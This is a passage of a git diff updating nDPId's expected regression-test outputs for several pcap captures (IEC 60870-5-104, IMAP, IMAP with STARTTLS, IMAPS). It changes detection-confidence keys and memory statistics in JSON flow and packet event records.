-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":107,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":107,"packets-processed":106,"total-skipped-flows":0,"total-l4-payload-len":343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1219992852463} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":124,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992961194,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":124,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992961194,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":147,"packets-processed":147,"total-skipped-flows":0,"total-l4-payload-len":748,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1219993055118} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 147/147 @@ -46,9 +46,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879006 bytes -~~ total memory freed........: 5879006 bytes -~~ total allocations/frees...: 118281/118281 +~~ total memory allocated....: 6012640 bytes +~~ total memory freed........: 6012640 bytes +~~ total allocations/frees...: 121043/121043 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 698 chars diff --git a/test/results/imap-starttls.pcap.out b/test/results/imap-starttls.pcap.out index 4c5207754..92d7616af 100644 --- a/test/results/imap-starttls.pcap.out +++ b/test/results/imap-starttls.pcap.out @@ -4,8 +4,8 @@ 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":6193,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1437584570828} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872440 bytes -~~ total memory freed........: 5872440 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6006074 bytes +~~ total memory freed........: 6006074 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 820 chars diff --git a/test/results/imap.pcap.out b/test/results/imap.pcap.out index 72ac1eab2..393da3432 100644 --- a/test/results/imap.pcap.out +++ b/test/results/imap.pcap.out @@ -4,8 +4,8 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} -00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} +00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":1580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1213095266780} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872468 bytes -~~ total memory freed........: 5872468 bytes -~~ total allocations/frees...: 118149/118149 +~~ total memory allocated....: 6006110 bytes +~~ total memory freed........: 6006110 bytes +~~ total allocations/frees...: 120911/120911 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 792 chars diff --git a/test/results/imaps.pcap.out b/test/results/imaps.pcap.out index 85203d0fb..1b763ff27 100644 --- a/test/results/imaps.pcap.out +++ b/test/results/imaps.pcap.out @@ -4,10 +4,10 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 